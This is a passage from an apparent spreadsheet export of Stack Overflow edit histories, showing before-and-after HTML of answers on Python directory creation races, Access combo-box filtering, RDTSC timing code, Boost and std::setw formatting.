 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; &lt;span class="hljs-keyword"&gt;not&lt;/span&gt; os.path.exists(directory):_x000D_
    os.makedirs(directory)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; As noted in comments and elsewhere, there's a &lt;span class="diff-delete"&gt;rare&lt;/span&gt; condition - if the directory is created between the &lt;code&gt;os.path.exists&lt;/code&gt; and the &lt;code&gt;os.makedirs&lt;/code&gt; calls, the &lt;code&gt;os.makedirs&lt;/code&gt; will fail with an &lt;code&gt;OSError&lt;/code&gt;. Unfortunately, blanket-catching &lt;code&gt;OSError&lt;/code&gt; and continuing is not foolproof, as it will ignore a failure to create the directory due to other factors, such as insufficient permissions, full disk, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; One option would be to trap the &lt;code&gt;OSError&lt;/code&gt; and examine the embedded error code, if one knew what's what (on my OS, 13 seems to indicate that permission is denied, and 17 that the file exists - it's not clear that that's even remotely portable, but is explored in &lt;a href="http://stackoverflow.com/questions/273698/is-there-a-cross-platform-way-of-getting-information-from-pythons-oserror"&gt;Is there a cross-platform way of getting information from Pythonâ€™s OSError&lt;/a&gt;). Alternatively, there could be a second &lt;code&gt;os.path.exists&lt;/code&gt;, but suppose another created the directory after the first check, then removed it before the second one - we could still be fooled.&lt;/p&gt; _x000D_
 &lt;p&gt; Depending on the application, the danger of concurrent operations may be more or less than the danger posed by other factors such as file permissions. The developer would have to know more about the particular application being developed and its expected environment before choosing an implementation.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I see two answers with good qualities, each with a small flaw, so I will give my take on it:&lt;/p&gt; _x000D_
 &lt;p&gt; Try &lt;a href="https://docs.python.org/2/library/os.path.html#os.path.exists" rel="nofollow noreferrer"&gt;&lt;code&gt;os.path.exists&lt;/code&gt;&lt;/a&gt;, and consider &lt;a href="https://docs.python.org/2/library/os.html#os.makedirs" rel="nofollow noreferrer"&gt;&lt;code&gt;os.makedirs&lt;/code&gt;&lt;/a&gt; for the creation.&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; &lt;span class="hljs-keyword"&gt;not&lt;/span&gt; os.path.exists(directory):_x000D_
    os.makedirs(directory)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; As noted in comments and elsewhere, there's a &lt;span class="diff-add"&gt;race&lt;/span&gt; condition - if the directory is created between the &lt;code&gt;os.path.exists&lt;/code&gt; and the &lt;code&gt;os.makedirs&lt;/code&gt; calls, the &lt;code&gt;os.makedirs&lt;/code&gt; will fail with an &lt;code&gt;OSError&lt;/code&gt;. Unfortunately, blanket-catching &lt;code&gt;OSError&lt;/code&gt; and continuing is not foolproof, as it will ignore a failure to create the directory due to other factors, such as insufficient permissions, full disk, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; One option would be to trap the &lt;code&gt;OSError&lt;/code&gt; and examine the embedded error code, if one knew what's what (on my OS, 13 seems to indicate that permission is denied, and 17 that the file exists - it's not clear that that's even remotely portable, but is explored in &lt;a href="http://stackoverflow.com/questions/273698/is-there-a-cross-platform-way-of-getting-information-from-pythons-oserror"&gt;Is there a cross-platform way of getting information from Pythonâ€™s OSError&lt;/a&gt;). Alternatively, there could be a second &lt;code&gt;os.path.exists&lt;/code&gt;, but suppose another created the directory after the first check, then removed it before the second one - we could still be fooled.&lt;/p&gt; _x000D_
 &lt;p&gt; Depending on the application, the danger of concurrent operations may be more or less than the danger posed by other factors such as file permissions. The developer would have to know more about the particular application being developed and its expected environment before choosing an implementation.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>GManNickG</t>
  </si>
  <si>
    <t>tumultous_rooster</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use &lt;a href="http://ultidev.com/products/cassini/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Cassini&lt;/span&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Free, Open Source.&lt;/p&gt; _x000D_
 &lt;p&gt; It would take trivial hacking to serve from memory.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use &lt;a href="http://www.asp.net/downloads/archived/cassini/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Cassini&lt;/span&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Free, Open Source.&lt;/p&gt; _x000D_
 &lt;p&gt; It would take trivial hacking to serve from memory.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jball</t>
  </si>
  <si>
    <t>felipe</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In a comment, lamcro observes in regard to the question of whether or not a comb box box has a Recordset:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; When I break into the forms VB code and "Add Watch" the CB control, the recordset property is in there. I can even enter and see it's own properties.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I see it when I set a watch list, but the recordset of a combo box is not accessible or alterable via code. In order to filter a combo box, you need to work with its Rowsource.&lt;/p&gt; _x000D_
 &lt;p&gt; This can be accomplished one of two ways:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; use an event to assign a new Rowsource to your combo boxes on the fly, OR&lt;/li&gt; _x000D_
  &lt;li&gt; use a reference to the control whose value you want to filter on in the WHERE clause of the Rowsource of your other combo boxes.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Say you have cmbComboBox1 and when you select a value in it, you want the values listed in cmbCombBox2 to be filtered according to the value selected in cmbComboBox1. For method 1, you'd use the first combo box's AfterUpdate to set the rowsource of the second:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  Private Sub cmbComboBox1_AfterUpdate()_x000D_
    Dim strRowsource As String_x000D_
_x000D_
    strRowsource  = "SELECT * FROM MyTable"_x000D_
    If Not IsNull(Me!cmbComboBox1) Then_x000D_
       strRowsource  = strRowsource &amp;amp; " WHERE MyField = " &amp;amp; Me!cmbComboBox1_x000D_
    End If_x000D_
    Me!cmbComboBox2.Rowsource = strRowsource_x000D_
  End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To use the second method, you'd instead define the Rowsource of the second combo box to be based on testing the value of the first:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT * FROM MyTable _x000D_
WHERE (MyField=[Forms]![MyForm]![cmbComboBox1] _x000D_
        AND IsNull([Forms]![MyForm]![cmbComboBox1])=False) _x000D_
   OR IsNull([Forms]![MyForm]![cmbComboBox1])=True_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What this does is filter the rowsource if the first combo box has a value and &lt;em&gt;doesn't&lt;/em&gt; filter it if there &lt;em&gt;is&lt;/em&gt; a value. That is, you get an unfiltered list until there's a value chosen for the first combo box.&lt;/p&gt; _x000D_
 &lt;p&gt; Then, in the Afterupdate event of cmbComboBox1, you'd requery the second combo box:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  Private Sub cmbComboBox1_AfterUpdate()_x000D_
    Me!cmbComboBox2.Requery_x000D_
  End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's also probably a good idea to define a parameter in order to insure that the reference to the form control gets appropriately resolved, so your Rowsource would be this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;PARAMETERS [Forms]![MyForm]![cmbComboBox1] Long;_x000D_
SELECT * FROM MyTable _x000D_
WHERE (MyField=[Forms]![MyForm]![cmbComboBox1] _x000D_
        AND IsNull([Forms]![MyForm]![cmbComboBox1])=False) _x000D_
   OR IsNull([Forms]![MyForm]![cmbComboBox1])=True_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;(assuming you're filtering on an Autonumber PK -- if the data type is different, you'd use a different data type, of course)&lt;/p&gt; _x000D_
 &lt;p&gt; I would tend to use the dynamic Rowsource assignment, simply because I've found it to be less problematic across different Access versions (i.e., references to controls on forms are not resolved the same way in all versions of Access).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In a comment, lamcro observes in regard to the question of whether or not a comb box box has a Recordset:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; When I break into the forms VB code and "Add Watch" the CB control, the recordset property is in there. I can even enter and see it's own properties.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I see it when I set a watch list, but the recordset of a combo box is not accessible or alterable via code. In order to filter a combo box, you need to work with its Rowsource.&lt;/p&gt; _x000D_
 &lt;p&gt; This can be accomplished one of two ways:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; use an event to assign a new Rowsource to your combo boxes on the fly, OR&lt;/li&gt; _x000D_
  &lt;li&gt; use a reference to the control whose value you want to filter on in the WHERE clause of the Rowsource of your other combo boxes.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Say you have cmbComboBox1 and when you select a value in it, you want the values listed in cmbCombBox2 to be filtered according to the value selected in cmbComboBox1. For method 1, you'd use the first combo box's AfterUpdate to set the rowsource of the second:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  Private Sub cmbComboBox1_AfterUpdate()_x000D_
    Dim strRowsource As String_x000D_
_x000D_
    strRowsource  = "SELECT * FROM MyTable"_x000D_
    If Not IsNull(Me!cmbComboBox1) Then_x000D_
       strRowsource  = strRowsource &amp;amp; " WHERE MyField = " &amp;amp; Me!cmbComboBox1_x000D_
    End If_x000D_
    Me!cmbComboBox2.Rowsource = strRowsource_x000D_
  End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To use the second method, you'd instead define the Rowsource of the second combo box to be based on testing the value of the first:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT * FROM MyTable _x000D_
WHERE (MyField=[Forms]![MyForm]![cmbComboBox1] _x000D_
        AND IsNull([Forms]![MyForm]![cmbComboBox1])=False) _x000D_
   OR IsNull([Forms]![MyForm]![cmbComboBox1])=True_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What this does is filter the rowsource if the first combo box has a value and &lt;em&gt;doesn't&lt;/em&gt; filter it if there &lt;em&gt;is&lt;/em&gt; a value. That is, you get an unfiltered list until there's a value chosen for the first combo box.&lt;/p&gt; _x000D_
 &lt;p&gt; Then, in the Afterupdate event of cmbComboBox1, you'd requery the second combo box:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  Private Sub cmbComboBox1_AfterUpdate()_x000D_
    Me!cmbComboBox2.Requery_x000D_
  End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's also probably a good idea to define a parameter in order to insure that the reference to the form control gets appropriately resolved, so your Rowsource would be this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;PARAMETERS [Forms]![MyForm]![cmbComboBox1] Long;_x000D_
SELECT * FROM MyTable _x000D_
WHERE (MyField=[Forms]![MyForm]![cmbComboBox1] _x000D_
        AND IsNull([Forms]![MyForm]![cmbComboBox1])=False) _x000D_
   OR IsNull([Forms]![MyForm]![cmbComboBox1])=True_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;(assuming you're filtering on an Autonumber PK -- if the data type is different, you'd use a different data type, of course)&lt;/p&gt; _x000D_
 &lt;p&gt; I would tend to use the dynamic Rowsource assignment, simply because I've found it to be less problematic across different Access versions (i.e., references to controls on forms are not resolved the same way in all versions of Access).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;-- &lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; David W. Fenton&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://dfenton.com/DFA/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;David Fenton Associates&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Someone mentioned it in the IRC, but google doesn't have a good answer.&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Someone mentioned it in the IRC, but google doesn't have a good answer.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; With that level of accuracy, it would be better to reason in CPU tick rather than in system call &lt;a href="http://mail.python.org/pipermail/python-list/2001-April/079815.html" rel="nofollow noreferrer"&gt;like clock()&lt;/a&gt;. And do not forget that if it takes more than one nanosecond to execute an instruction... having a nanosecond accuracy is pretty much impossible.&lt;/p&gt; _x000D_
 &lt;p&gt; Still, &lt;a href="http://coding.derkeiler.com/Archive/C_CPP/comp.lang.cpp/2004-03/1376.html" rel="nofollow noreferrer"&gt;something like that&lt;/a&gt; is a start:&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the actual code to retrieve number of 80x86 CPU clock ticks passed since the CPU was last started. It will work on Pentium and above (386/486 not supported). This code is actually MS Visual C++ specific, but can be probably very easy ported to whatever else, as long as it supports inline assembly.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;__int64 GetCpuClocks();    // adds a signature_x000D_
int main()_x000D_
{_x000D_
 __int64 time;_x000D_
 time = GetCpuClocks();   // use this to cout the time_x000D_
 // do something..._x000D_
_x000D_
}_x000D_
_x000D_
&lt;/span&gt;inline __int64 GetCpuClocks()_x000D_
{_x000D_
_x000D_
    // Counter_x000D_
    struct { &lt;span class="diff-delete"&gt;__int32&lt;/span&gt; low, high; } counter;_x000D_
_x000D_
    // Use RDTSC instruction to get clocks count_x000D_
    __asm push EAX_x000D_
    __asm push EDX_x000D_
    __asm __emit 0fh __asm __emit 031h // RDTSC_x000D_
    __asm mov counter.low, EAX_x000D_
    __asm mov counter.high, EDX_x000D_
    __asm pop EDX_x000D_
    __asm pop EAX_x000D_
_x000D_
    // Return result_x000D_
    return *(__int64 *)(&amp;amp;counter);_x000D_
_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This function has also the advantage of being extremely fast - it usually takes no more than 50 cpu cycles to execute.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.devx.com/MicrosoftISV/Article/16293" rel="nofollow noreferrer"&gt;Using the Timing Figures&lt;/a&gt;:&lt;br&gt; If you need to translate the clock counts into true elapsed time, divide the results by your chip's clock speed. Remember that the "rated" GHz is likely to be slightly different from the actual speed of your chip. To check your chip's true speed, you can use several very good utilities or the Win32 call, QueryPerformanceFrequency().&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; With that level of accuracy, it would be better to reason in CPU tick rather than in system call &lt;a href="http://mail.python.org/pipermail/python-list/2001-April/079815.html" rel="nofollow noreferrer"&gt;like clock()&lt;/a&gt;. And do not forget that if it takes more than one nanosecond to execute an instruction... having a nanosecond accuracy is pretty much impossible.&lt;/p&gt; _x000D_
 &lt;p&gt; Still, &lt;a href="http://coding.derkeiler.com/Archive/C_CPP/comp.lang.cpp/2004-03/1376.html" rel="nofollow noreferrer"&gt;something like that&lt;/a&gt; is a start:&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the actual code to retrieve number of 80x86 CPU clock ticks passed since the CPU was last started. It will work on Pentium and above (386/486 not supported). This code is actually MS Visual C++ specific, but can be probably very easy ported to whatever else, as long as it supports inline assembly.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;inline __int64 GetCpuClocks()_x000D_
{_x000D_
_x000D_
    // Counter_x000D_
    struct { &lt;span class="diff-add"&gt;int32&lt;/span&gt; low, high; } counter;_x000D_
_x000D_
    // Use RDTSC instruction to get clocks count_x000D_
    __asm push EAX_x000D_
    __asm push EDX_x000D_
    __asm __emit 0fh __asm __emit 031h // RDTSC_x000D_
    __asm mov counter.low, EAX_x000D_
    __asm mov counter.high, EDX_x000D_
    __asm pop EDX_x000D_
    __asm pop EAX_x000D_
_x000D_
    // Return result_x000D_
    return *(__int64 *)(&amp;amp;counter);_x000D_
_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This function has also the advantage of being extremely fast - it usually takes no more than 50 cpu cycles to execute.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.devx.com/MicrosoftISV/Article/16293" rel="nofollow noreferrer"&gt;Using the Timing Figures&lt;/a&gt;:&lt;br&gt; If you need to translate the clock counts into true elapsed time, divide the results by your chip's clock speed. Remember that the "rated" GHz is likely to be slightly different from the actual speed of your chip. To check your chip's true speed, you can use several very good utilities or the Win32 call, QueryPerformanceFrequency().&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>CppLearner</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yes, you can. Just copy the binary and off you go.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Update: this requires ODBC to be installed, otherwise it will not work. You have a better luck writing your own tool, like explained &lt;/span&gt;&lt;a href="http://weblogs.asp.net/jgalloway/archive/2006/11/07/Handling-_2200_GO_2200_-Separators-in-SQL-Scripts-_2D00_-the-easy-way.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yes, you can. Just copy the binary and off you go.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Matthew Farwell</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;shared_ptr&lt;/code&gt; and &lt;code&gt;weak_ptr&lt;/code&gt;, especially in &lt;span class="diff-delete"&gt;multi-threaded&lt;/span&gt; code, are alone worth installing boost. &lt;code&gt;BOOST_STATIC_ASSERT&lt;/code&gt; is also pretty cool for doing compile-time logic checking.&lt;/p&gt; _x000D_
 &lt;p&gt; The fact that a lot of the classes and utilities in boost are in headers, meaning you can get a lot of functionality without having to compile anything at all, is also a plus. Portability usually isn't a problem, unless you use an extremely old compiler. I once tried to get MPL to work with VC6 and it printed out 40,000 warnings/internal errors before exploding completely. But in general most of the library should work regardless of your platform or compiler vendor.&lt;/p&gt; _x000D_
 &lt;p&gt; Take into consideration the fact that quite a few things from Boost are already in TR1, and will most likely be in the next revision of the C++ standard library. That's a pretty big endorsement.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;shared_ptr&lt;/code&gt; and &lt;code&gt;weak_ptr&lt;/code&gt;, especially in &lt;span class="diff-add"&gt;multithreaded&lt;/span&gt; code, are alone worth installing boost. &lt;code&gt;BOOST_STATIC_ASSERT&lt;/code&gt; is also pretty cool for doing compile-time logic checking.&lt;/p&gt; _x000D_
 &lt;p&gt; The fact that a lot of the classes and utilities in boost are in headers, meaning you can get a lot of functionality without having to compile anything at all, is also a plus. Portability usually isn't a problem, unless you use an extremely old compiler. I once tried to get MPL to work with VC6 and it printed out 40,000 warnings/internal errors before exploding completely. But in general most of the library should work regardless of your platform or compiler vendor.&lt;/p&gt; _x000D_
 &lt;p&gt; Take into consideration the fact that quite a few things from Boost are already in TR1, and will most likely be in the next revision of the C++ standard library. That's a pretty big endorsement.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://groups.google.com/groups/search?safe=off&amp;amp;q=database+group%3Amicrosoft*&amp;amp;btnG=Rechercher&amp;amp;as_mind=1&amp;amp;as_minm=1&amp;amp;as_miny=1996&amp;amp;as_maxd=1&amp;amp;as_maxm=1&amp;amp;as_maxy=1999&amp;amp;as_drrb=b&amp;amp;sitesearch=" rel="nofollow noreferrer"&gt;http://groups.google.com/groups/search?safe=off&amp;amp;q=database+group%3Amicrosoft*&amp;amp;btnG=Rechercher&amp;amp;as_mind=1&amp;amp;as_minm=1&amp;amp;as_miny=1996&amp;amp;as_maxd=1&amp;amp;as_maxm=1&amp;amp;as_maxy=1999&amp;amp;as_drrb=b&amp;amp;sitesearch=&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; as in: this &lt;/span&gt;&lt;a href="http://groups.google.com/groups/search?safe=off&amp;amp;q=database+group%3Amicrosoft*&amp;amp;btnG=Rechercher&amp;amp;as_mind=1&amp;amp;as_minm=1&amp;amp;as_miny=1996&amp;amp;as_maxd=1&amp;amp;as_maxm=1&amp;amp;as_maxy=1999&amp;amp;as_drrb=b&amp;amp;sitesearch=" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;link&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; seems to work nicely... 994 results (no &lt;em&gt;thousands&lt;/em&gt; but still...)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://groups.google.com/groups/search?safe=off&amp;amp;q=database+group%3Amicrosoft*&amp;amp;btnG=Rechercher&amp;amp;as_mind=1&amp;amp;as_minm=1&amp;amp;as_miny=1996&amp;amp;as_maxd=1&amp;amp;as_maxm=1&amp;amp;as_maxy=1999&amp;amp;as_drrb=b&amp;amp;sitesearch=" rel="nofollow noreferrer"&gt;http://groups.google.com/groups/search?safe=off&amp;amp;q=database+group%3Amicrosoft*&amp;amp;btnG=Rechercher&amp;amp;as_mind=1&amp;amp;as_minm=1&amp;amp;as_miny=1996&amp;amp;as_maxd=1&amp;amp;as_maxm=1&amp;amp;as_maxy=1999&amp;amp;as_drrb=b&amp;amp;sitesearch=&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; seems to work nicely... 994 results (no &lt;em&gt;thousands&lt;/em&gt; but still...)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>VonC</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://en.cppreference.com/w/cpp/io/manip/setw" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;std::setw&lt;/span&gt;&lt;/code&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;_x000D_
#include &amp;lt;iomanip&amp;gt;_x000D_
_x000D_
int main () &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="diff-delete"&gt;std::&lt;/span&gt;cout &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;setw(21) &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;left &amp;lt;&amp;lt; "Test"   &amp;lt;&amp;lt; 1 &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;'\n';&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="diff-delete"&gt;std::&lt;/span&gt;cout &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;setw(21) &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;left &amp;lt;&amp;lt; "Test2"  &amp;lt;&amp;lt; 2 &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;'\n';&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="diff-delete"&gt;std::&lt;/span&gt;cout &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;setw(21) &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;left &amp;lt;&amp;lt; "Iamlongverylongblah"    &amp;lt;&amp;lt; 2 &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;'\n';&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="diff-delete"&gt;std::&lt;/span&gt;cout &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;setw(21) &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;std::&lt;/span&gt;left &amp;lt;&amp;lt; "Etc"    &amp;lt;&amp;lt; 1 &amp;lt;&amp;lt; &lt;span class="diff-delete"&gt;'\n';&lt;/span&gt; _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.cplusplus.com/reference/iostream/manipulators/setw.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;setw&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;_x000D_
#include &amp;lt;iomanip&amp;gt;&lt;span class="diff-add"&gt;_x000D_
using namespace std;&lt;/span&gt;_x000D_
_x000D_
int main () {_x000D_
  cout &amp;lt;&amp;lt; setw(21) &amp;lt;&amp;lt; left &amp;lt;&amp;lt; "Test"&lt;span class="diff-add"&gt; &lt;/span&gt;   &amp;lt;&amp;lt; 1 &amp;lt;&amp;lt; &lt;span class="diff-add"&gt;endl;&lt;/span&gt;_x000D_
  cout &amp;lt;&amp;lt; setw(21) &amp;lt;&amp;lt; left &amp;lt;&amp;lt; "Test2"&lt;span class="diff-add"&gt; &lt;/span&gt;  &amp;lt;&amp;lt; 2 &amp;lt;&amp;lt; &lt;span class="diff-add"&gt;endl;&lt;/span&gt;_x000D_
  cout &amp;lt;&amp;lt; setw(21) &amp;lt;&amp;lt; left &amp;lt;&amp;lt; "Iamlongverylongblah"&lt;span class="diff-add"&gt; &lt;/span&gt;    &amp;lt;&amp;lt; 2 &amp;lt;&amp;lt; &lt;span class="diff-add"&gt;endl;&lt;/span&gt;_x000D_
  cout &amp;lt;&amp;lt; setw(21) &amp;lt;&amp;lt; left &amp;lt;&amp;lt; "Etc"&lt;span class="diff-add"&gt; &lt;/span&gt;    &amp;lt;&amp;lt; 1 &amp;lt;&amp;lt; &lt;span class="diff-add"&gt;endl;_x000D_
 &lt;/span&gt; &lt;span class="diff-add"&gt;return 0;&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Eugene Yokota</t>
  </si>
  <si>
    <t>user283145</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; with regards to '&lt;strong&gt;describe-last-function&lt;/strong&gt;':&lt;/p&gt; _x000D_
 &lt;p&gt; There's a variable &lt;code&gt;last-command&lt;/code&gt; which is set to a symbol representative of the last thing you did. So this elisp snippet - &lt;code&gt;(&lt;span class="diff-delete"&gt;describe&lt;/span&gt;-&lt;span class="diff-delete"&gt;variable&lt;/span&gt; last-command)&lt;/code&gt; - ought to bring up the documentation for the thing that immediately happened.&lt;/p&gt; _x000D_
 &lt;p&gt; If you've banged on a few keys or done something that modified last-command since the thing you're interested in, the &lt;code&gt;command-history&lt;/code&gt; function might be of interest. You can get that by &lt;strong&gt;M-x command-history&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; with regards to '&lt;strong&gt;describe-last-function&lt;/strong&gt;':&lt;/p&gt; _x000D_
